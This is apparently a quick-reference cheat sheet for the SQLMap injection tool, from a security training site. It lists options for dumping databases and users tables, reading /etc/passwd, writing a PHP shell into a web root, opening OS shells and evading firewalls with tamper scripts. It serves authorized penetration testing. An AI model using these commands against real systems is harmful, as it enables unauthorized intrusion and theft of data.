SQLMap Quick Reference
Hackers Manifest - hackersmanifest.com
Quick Reference
Automated SQL injection detection and exploitation tool reference.
🎯 Basic Usage
| Test GET param | sqlmap -u "URL?id=1" |
| Test POST data | sqlmap -u "URL" --data="user=x" |
| From Burp request | sqlmap -r request.txt |
| Specific param | sqlmap -u "URL" -p id |
| With cookie | sqlmap -u "URL" --cookie="SESS=x" |
| Custom header | sqlmap -u "URL" --headers="X-Token: x" |
| Through proxy | sqlmap -u "URL" --proxy=http://127.0.0.1:8080 |
| Random agent | sqlmap -u "URL" --random-agent |
🔍 Detection Options
| Level (1-5) | sqlmap -u "URL" --level=5 |
| Risk (1-3) | sqlmap -u "URL" --risk=3 |
| Full scan | --level=5 --risk=3 |
| Force DBMS | --dbms=mysql |
| Technique | --technique=BEUST |
| Time delay | --time-sec=5 |
| String match | --string="Welcome" |
Techniques: B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline
📊 Enumeration
| Banner | --banner |
| Current user | --current-user |
| Current DB | --current-db |
| Is DBA? | --is-dba |
| List databases | --dbs |
| List tables | -D dbname --tables |
| List columns | -D db -T table --columns |
| Dump table | -D db -T table --dump |
| Dump columns | -D db -T tbl -C col1,col2 --dump |
| Dump all | --dump-all |
| Row count | -D db -T table --count |
💻 OS Access
| OS shell | --os-shell |
| OS command | --os-cmd="whoami" |
| SQL shell | --sql-shell |
| Read file | --file-read="/etc/passwd" |
| Write file | --file-write="shell.php" --file-dest="/var/www/" |
| Registry read | --reg-read --reg-key="HKLM\..." |
🛡️ Bypass Techniques
| Tamper script | --tamper=space2comment |
| Multiple tampers | --tamper=between,randomcase |
| WAF bypass | --tamper=charencode |
| Hex encode | --hex |
| No casting | --no-cast |
| Skip URL encode | --skip-urlencode |
⚡ Performance
| Threads | --threads=10 |
| Delay | --delay=1 |
| Timeout | --timeout=30 |
| Retries | --retries=3 |
| Batch mode | --batch |
| Verbose | -v 3 |
| Output dir | --output-dir=/path/ |
🔧 Common Tamper Scripts
space2commentspace2plusrandomcasebetweencharencodeequaltolikebase64encodeapostrophemask🎯 Common Scan Profiles
Quick Test
sqlmap -u "URL?id=1" --batch Full Enumeration
sqlmap -u "URL" --level=5 --risk=3 --dbs --batch Dump Users Table
sqlmap -u "URL" -D db -T users --dump --batch WAF Bypass
sqlmap -u "URL" --tamper=space2comment,between --random-agent Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com